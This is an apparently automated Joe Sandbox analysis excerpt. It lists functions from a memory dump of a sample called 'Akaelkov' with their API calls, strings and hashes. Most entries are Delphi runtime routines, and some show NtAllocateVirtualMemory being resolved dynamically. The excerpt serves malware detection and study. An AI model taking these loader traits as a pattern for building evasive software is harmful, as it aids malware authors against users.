Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
String ID: BCryptVerifySignature$bcrypt
API String ID: 1002360270-4067648912
Opcode ID: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction ID: 5c02ce4393725b3ae847a97d39395897fd55f8c03bd9d7c2346c93cd78c2f3ac
Opcode Fuzzy Hash: dec7ec7695fe1640c704fb7054e57799260cb30f75dba453070541c8a224f21d
Instruction Fuzzy Hash: 60F0E9315057157EF11071345D40EFF729DCBC2778F148A2DF594EA180D662AD4982BA

Uniqueness

Uniqueness Score: -1.00%

Function 0408FB7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0408FB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0408FB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0408FBB3

Strings

C:\Windows\System32\ntdll.dll, xrefs: 0408FB88
NtAllocateVirtualMemory, xrefs: 0408FB83

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: b43b267bc352eb4cc4c21a604f8e3708ea86073cc9056120a8d52aca0785b01a
Instruction ID: 3c340b994b48c90bfe35ffb4663d56511b81cc32b41867160c8cb095f6f020af
Opcode Fuzzy Hash: b43b267bc352eb4cc4c21a604f8e3708ea86073cc9056120a8d52aca0785b01a
Instruction Fuzzy Hash: 6AE01AB260020DBFDB00EFA8D941EDB37ECEB08750F004415BA09EB101D675F990CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0408FB80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 0408FB8D
GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0408FB93
NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0408FBB3

Strings

C:\Windows\System32\ntdll.dll, xrefs: 0408FB88
NtAllocateVirtualMemory, xrefs: 0408FB83

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressAllocateHandleMemoryModuleProcVirtual
String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
API String ID: 421316089-2206134580
Opcode ID: c7098c9258a346c5f97600179207324f8f828775c1115547657c6afc10a94b8d
Instruction ID: afa9fbeebf0456f21e2750c2b2cc8ba50e1692d5492919b2756c59feafb2d94b
Opcode Fuzzy Hash: c7098c9258a346c5f97600179207324f8f828775c1115547657c6afc10a94b8d
Instruction Fuzzy Hash: 54E01AB250020DBBCB00EFA8D941ECB37ECEB08750F004405BA09EB101C675F990CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0408FD38 Relevance: 4.6, APIs: 3, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(0410A358,00000000), ref: 0408FD97
GetCurrentProcess.KERNEL32(0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0408FDE3
FreeLibrary.KERNEL32(0410A358,00000000,0410A35C,Function_00005ADC,00000004,0410A360,00000000,0410A35C,17D783FC,00000040,0410A360,0410A358,00000000,00000000,00000000,00000000), ref: 0408FDF4

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressCurrentFreeLibraryProcProcess
String ID:
API String ID: 4006369052-0
Opcode ID: cd7cebcd169e748ce482d77e9830ddd876d08922a9d9020ffe1e35684b6454b7
Instruction ID: deac98659a27f91d6c6f0a5babf4d6e15d102c5a32ce73f1a0835cef2baf0caf
Opcode Fuzzy Hash: cd7cebcd169e748ce482d77e9830ddd876d08922a9d9020ffe1e35684b6454b7
Instruction Fuzzy Hash: 21117F70A00744BBEB00FBB8CE52B9E7BA8DF0565CF508414B144FB290CB79BD908B1A

Uniqueness

Uniqueness Score: -1.00%

Function 040CB768 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 040CB7A3
NtClose.NTDLL(?), ref: 040CB81D

Part of subcall function 04074F68: SysFreeString.OLEAUT32 ref: 04074F76

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Path$CloseFreeNameName_String
String ID:
API String ID: 11680810-0
Opcode ID: f3dfeb7edf34c0e0e80aa8ee9a8a90059857f0c0528731accb320a6f1f27e662
Instruction ID: d07a739946f4dc44da01d8904281947e3085d5a3f039beee63d02e4f76bb3b6f
Opcode Fuzzy Hash: f3dfeb7edf34c0e0e80aa8ee9a8a90059857f0c0528731accb320a6f1f27e662
Instruction Fuzzy Hash: 9721CC71A50308BAEB11EBA4DC42FDEB7BCAB08B08F510565F600F71C0DAB4BA059B95

Uniqueness

Uniqueness Score: -1.00%

Function 040B7420 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32(?,00000000,040B7598), ref: 040B7441
GetCurrentThreadId.KERNEL32 ref: 040B748F
GlobalAddAtomA.KERNEL32(00000000), ref: 040B74C5
RegisterClipboardFormatA.USER32(00000000), ref: 040B74DB

Part of subcall function 04087B44: RtlInitializeCriticalSection.NTDLL(List), ref: 04087B63

Part of subcall function 040B7028: SetErrorMode.KERNEL32(00008000), ref: 040B7041
Part of subcall function 040B7028: GetModuleHandleA.KERNEL32(USER32,00000000,040B718E,?,00008000), ref: 040B7065
Part of subcall function 040B7028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 040B7072
Part of subcall function 040B7028: LoadLibraryA.KERNEL32(imm32.dll,00000000,040B718E,?,00008000), ref: 040B708E
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmGetContext), ref: 040B70B0
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmReleaseContext), ref: 040B70C5
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmGetConversionStatus), ref: 040B70DA
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmSetConversionStatus), ref: 040B70EF
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmSetOpenStatus), ref: 040B7104
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmSetCompositionWindow), ref: 040B7119
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmSetCompositionFontA), ref: 040B712E
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmGetCompositionStringA), ref: 040B7143
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmIsIME), ref: 040B7158
Part of subcall function 040B7028: GetProcAddress.KERNEL32(040DB54C,ImmNotifyIME), ref: 040B716D
Part of subcall function 040B7028: SetErrorMode.KERNEL32(?,040B7195,00008000), ref: 040B7188

Part of subcall function 040C1538: GetKeyboardLayout.USER32(00000000), ref: 040C157D

Part of subcall function 040C2740: LoadIconA.USER32(04107030,MAINICON), ref: 040C2837
Part of subcall function 040C2740: GetModuleFileNameA.KERNEL32(04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?,00000000,?,00000000,040B7598), ref: 040C2869
Part of subcall function 040C2740: OemToCharA.USER32(?,?), ref: 040C287C
Part of subcall function 040C2740: CharNextA.USER32(?,?,?,04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?,00000000), ref: 040C28BB
Part of subcall function 040C2740: CharLowerA.USER32(00000000,?,?,?,04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?), ref: 040C28C1

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,040B7598), ref: 040B755F
GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 040B7570

Strings

USER32, xrefs: 040B755A
ControlOfs%.8X%.8X, xrefs: 040B74A3
Delphi%.8X, xrefs: 040B7452
AnimateWindow, xrefs: 040B756A

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: AddressProc$CharModule$CurrentErrorHandleLoadMode$AtomClipboardCriticalFileFormatGlobalIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
API String ID: 1041971040-1126952177
Opcode ID: 2b8342c28ca1c801fcd4af707f3f9d45b3bb22371873fdd4f0a183c9708052db
Instruction ID: c7ad049dcc2a0664f8244870b458572d1589ec52ceed2c21f22428c1290fc38d
Opcode Fuzzy Hash: 2b8342c28ca1c801fcd4af707f3f9d45b3bb22371873fdd4f0a183c9708052db
Instruction Fuzzy Hash: CF412BB4E002099BE700FFA9D8909DE77B9EB5920CB018525E405F7251DA79BD848F99

Uniqueness

Uniqueness Score: -1.00%

Function 040C2740 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(04107030,MAINICON), ref: 040C2837
GetModuleFileNameA.KERNEL32(04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?,00000000,?,00000000,040B7598), ref: 040C2869
OemToCharA.USER32(?,?), ref: 040C287C
CharNextA.USER32(?,?,?,04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?,00000000), ref: 040C28BB
CharLowerA.USER32(00000000,?,?,?,04107030,?,00000100,04107030,MAINICON,?,?,?,040B7530,00000000,00000000,?), ref: 040C28C1

Part of subcall function 040C2A94: GetClassInfoA.USER32(041097F8,040DB674,?), ref: 040C2AF3
Part of subcall function 040C2A94: RegisterClassA.USER32(040DB650), ref: 040C2B0B
Part of subcall function 040C2A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 040C2BA7
Part of subcall function 040C2A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 040C2BC9

Strings

MAINICON, xrefs: 040C282A

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
String ID: MAINICON
API String ID: 2763768735-2283262055
Opcode ID: 8e83b239960b8265144de6a346d600fae8a7f33a6a120ea5c7d456af3be5487e
Instruction ID: fb1e7826ce0ec8382ea5f9902ce4d8900536aeff541a07d59e7f43592c78969b
Opcode Fuzzy Hash: 8e83b239960b8265144de6a346d600fae8a7f33a6a120ea5c7d456af3be5487e
Instruction Fuzzy Hash: D8511270A04245DFEB50EF68C884BC97BE4AB1530CF4441B9DC48EF256D7B9A988CB65

Uniqueness

Uniqueness Score: -1.00%

Function 040717C3 Relevance: 9.0, APIs: 7, Instructions: 288
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 0407186C
Sleep.KERNEL32(0000000A,00000000), ref: 04071882

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1ddd4194d8da4c4630a6c025c1479181092807dbfe480be67e3bf53c9a04f5ba
Instruction ID: 9b6a8f4513c4d1e4acd162249a5f022f78bda6e3872908fd15118eaf861276f6
Opcode Fuzzy Hash: 1ddd4194d8da4c4630a6c025c1479181092807dbfe480be67e3bf53c9a04f5ba
Instruction Fuzzy Hash: D9B12672A003118BC715CF69E884365BBE1FB85354F1882AED465AF3C5D7B8B8C1CB96

Uniqueness

Uniqueness Score: -1.00%

Function 04071B2B Relevance: 7.7, APIs: 6, Instructions: 173
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000), ref: 04071BB3
Sleep.KERNEL32(0000000A,00000000), ref: 04071BCD

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 623edf578640f13ea373fcbe942470d71ad0eec17b66cb473c21c71429a9eff8
Instruction ID: 5b27560811c23b4ab9d2b9ca89ebaed9360bf62f16d1cb7077ecbb9a85c0e1d1
Opcode Fuzzy Hash: 623edf578640f13ea373fcbe942470d71ad0eec17b66cb473c21c71429a9eff8
Instruction Fuzzy Hash: B651E171A103408FEB158F68D985766BBD4EF45318F1881AED444AF3C2E6B4F885CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0409765C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00000008,0410A374,00000048), ref: 04097682

Part of subcall function 04097618: SelectObject.GDI32(00000000,0410A380), ref: 04097633

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 040976D8
Tahoma, xrefs: 040976A4
MS Shell Dlg 2, xrefs: 040976EC

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: ObjectSelect
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
API String ID: 1517587568-1011973972
Opcode ID: ca9e655dc8ed7556d74959dc7e76bf118a99cc8263d025620293aec8a31daff1
Instruction ID: cfe42c1f01d578b269362d38390d23867c803d24dcefd1cfd9d9458660536212
Opcode Fuzzy Hash: ca9e655dc8ed7556d74959dc7e76bf118a99cc8263d025620293aec8a31daff1
Instruction Fuzzy Hash: DE11A332A10208EFEF41EFA8C94199DBBF5EF4A608F914460E840B7650DB35BD41EB15

Uniqueness

Uniqueness Score: -1.00%

Function 0408EA38 Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoA.USER32(041097F8,040DAB1C,?), ref: 0408EA59
UnregisterClassA.USER32(040DAB1C,041097F8), ref: 0408EA82
RegisterClassA.USER32(040DAAF8), ref: 0408EA8C
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0408EAD7

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: e634ed528da378c5aaef80610f86dc106d3915ebeb71d2ffb9f6a082ed0be731
Instruction ID: b6b30849b7d8738359af6a094937600510eed23175ba806956ad8b45d21f3813
Opcode Fuzzy Hash: e634ed528da378c5aaef80610f86dc106d3915ebeb71d2ffb9f6a082ed0be731
Instruction Fuzzy Hash: 62016172B002056BEA40FF98DC90FDA37D9EB09718F108124B955F7282D679FC858BA6

Uniqueness

Uniqueness Score: -1.00%

Function 04090308 Relevance: 4.6, APIs: 3, Instructions: 132
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,040904A2), ref: 04090374
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,040904A2), ref: 040903DF
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 04090444

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 86797d4d26a01b277af2700df6f229cb6330cf017765e743632db33bb38913da
Instruction ID: 335ddb25b46f7f06e6152ae69fc06078a52111e26bc282db348e5e57b549a607
Opcode Fuzzy Hash: 86797d4d26a01b277af2700df6f229cb6330cf017765e743632db33bb38913da
Instruction Fuzzy Hash: FA417F70B40648BFEF11EBA4C951BDEBBF9AF04308F108469A844B7251DBB5AF05AB45

Uniqueness

Uniqueness Score: -1.00%

Function 0408F2A8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 0408F5A6

Strings

H, xrefs: 0408F35D

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 55380cfe049a58cc8e581fdfff9da7b4fcfff47eea94b9c22ea8e3c03c7c32bb
Instruction ID: 0f4123984c2daef85a4b4e8671ddc63f278efeb4a27c975c1c752769619a6ee1
Opcode Fuzzy Hash: 55380cfe049a58cc8e581fdfff9da7b4fcfff47eea94b9c22ea8e3c03c7c32bb
Instruction Fuzzy Hash: 2EB10374A01609DFDB50EFA9D580A9DBBF2FF89314F24816AE945AB320D730AC45CF54

Uniqueness

Uniqueness Score: -1.00%

Function 040904C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,MS Shell Dlg 2,?,MS Shell Dlg 2,?,04090524), ref: 040904F2

Strings

MS Shell Dlg 2, xrefs: 040904C1, 040904C3

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: QueryValue
String ID: MS Shell Dlg 2
API String ID: 3660427363-3198668166
Opcode ID: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction ID: 5415ca53fb44f174396735fabb7bcae4b0659d104c51bdde3db26e1f60c4db35
Opcode Fuzzy Hash: d6d635c7fda5a2b0c2ef885cbdc5b590131df5697dd5999feed7db602a326472
Instruction Fuzzy Hash: 70F030723091486BE704EAAD9D40FEB7BDCDB85258F01853AB94CD7250DA21EC099765

Uniqueness

Uniqueness Score: -1.00%

Function 04074444 Relevance: 3.1, APIs: 2, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fefd3c6397b0fd034367a5621862a973db13644aa33152177d2c433fb55745b
Instruction ID: 345eb865f2f1be4abe7419c268b7201deaa8bbb80aecd025e894e917ad74603f
Opcode Fuzzy Hash: 6fefd3c6397b0fd034367a5621862a973db13644aa33152177d2c433fb55745b
Instruction Fuzzy Hash: 5B419FB5D012448FEB64DF69D4847997BE0FB0A328F148159D818AB285C7B8B8C5CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 0407F6D0 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0407F6DF

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ceec14ed585e301059c968f4b93f140275ac951cfec4f703c25562629e7343be
Instruction ID: cca3a198bdc4726581a55f6ac7153758b7d39710e1951139b935fae8d94677be
Opcode Fuzzy Hash: ceec14ed585e301059c968f4b93f140275ac951cfec4f703c25562629e7343be
Instruction Fuzzy Hash: 1BF0C278F1424286A7117B38CDC4DF9239DAF4128CB504475E046BB251DB25FC4AD36F

Uniqueness

Uniqueness Score: -1.00%

Function 0407F768 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0407F7A8

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: fe571bd1c8accac6d1faa27284f2e56eb00b19114b5e2f043710f4e51ab8f742
Instruction ID: d0f1a4674bc633da80217cddf23f8e8a1f77784691d7ec78ec0e26cd209d09ef
Opcode Fuzzy Hash: fe571bd1c8accac6d1faa27284f2e56eb00b19114b5e2f043710f4e51ab8f742
Instruction Fuzzy Hash: 37314371E002069FEB90DF98C884AAE77E8FB09308F444566F905E3250D634F950D75B

Uniqueness

Uniqueness Score: -1.00%

Function 0407FACC Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 0407FAED

Part of subcall function 0407F6D0: VariantClear.OLEAUT32(?), ref: 0407F6DF

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 7f4d1b397fddb802c747c5cef14cca82782ab380b521a3b00f881c3ee151bac6
Instruction ID: a4747f0c3fda9a94b03277b76e20fbd534b6dfb7b3624e3f0ae9dad589099ed6
Opcode Fuzzy Hash: 7f4d1b397fddb802c747c5cef14cca82782ab380b521a3b00f881c3ee151bac6
Instruction Fuzzy Hash: DC11A970F0031297DB20BF25C8D09AB73E5EFC52987148466E44ABB215DA74FC40D7AB

Uniqueness

Uniqueness Score: -1.00%

Function 0407738A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 040773CB

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction ID: 11844c0b801480feae78f551c83c839670097ccbc85b0c4236a8307041f4f4f4
Opcode Fuzzy Hash: 1e10244509fb37749eab8e1d646779dac0720b100661c13c3500a1fb3d533986
Instruction Fuzzy Hash: B5F07FB2700118BF9B80DE9DDC80EDB77ECEB4C2A8B054169BA08E3200D630ED109BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0407738C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 040773CB

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction ID: 0ae9059a4982a0cd9aa3e2b2f2df399701bc3e28af898dcdc50fb96f7c982261
Opcode Fuzzy Hash: 251e92fc10e7af7397377603fe9152e2251dce8f56d160a47fc6d7711774cdb8
Instruction Fuzzy Hash: FAF092B2600118BF9B80DE9DDC80EDB77ECEB4C2A8B054169FA0CE3200D630ED109BB5

Uniqueness

Uniqueness Score: -1.00%

Function 040D95F8 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00000000,040D967E), ref: 040D9612

Part of subcall function 040B7420: GetCurrentProcessId.KERNEL32(?,00000000,040B7598), ref: 040B7441
Part of subcall function 040B7420: GetCurrentThreadId.KERNEL32 ref: 040B748F
Part of subcall function 040B7420: GlobalAddAtomA.KERNEL32(00000000), ref: 040B74C5
Part of subcall function 040B7420: RegisterClipboardFormatA.USER32(00000000), ref: 040B74DB
Part of subcall function 040B7420: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,040B7598), ref: 040B755F
Part of subcall function 040B7420: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 040B7570

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4071000_Akaelkov.jbxd

Similarity

API ID: Current$AddressAtomClipboardFormatGlobalHandleModuleProcProcessRegisterThreadVersion
String ID:
API String ID: 2893432522-0
Opcode ID: 18a6cbc0c51434d4dead7ba8cf5986eff94b3b1061f85647efba522fbd27e436
Instruction ID: c27d7a8328bbcb415eb9e6e75fecfc3c5f849e8b7eadacbefff42e9fbf05e325
Opcode Fuzzy Hash: 18a6cbc0c51434d4dead7ba8cf5986eff94b3b1061f85647efba522fbd27e436
Instruction Fuzzy Hash: F2F0C274205A00AFE315FF28EE4185577E4FB8A31C3500434E440BBA18CABDBC918B44

Uniqueness

Uniqueness Score: -1.00%

Function 04075B78 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02A41B20,?,00000105), ref: 04075B96

Part of subcall function 04075DDC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 04075DF8
Part of subcall function 04075DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075E16
Part of subcall function 04075DDC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075E34
Part of subcall function 04075DDC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 04075E52
Part of subcall function 04075DDC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,04075EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 04075E9B
Part of subcall function 04075DDC: RegQueryValueExA.ADVAPI32(?,04076048,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,04075EE1,?,80000001), ref: 04075EB9
Part of subcall function 04075DDC: RegCloseKey.ADVAPI32(?,04075EE8,00000000,00000000,00000005,00000000,04075EE1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04075EDB

Memory Dump Source

Source File: 00000005.00000002.2154818819.0000000004071000.00000020.00001000.00020000.00000000.sdmp, Offset: 04071000, based on PE: false

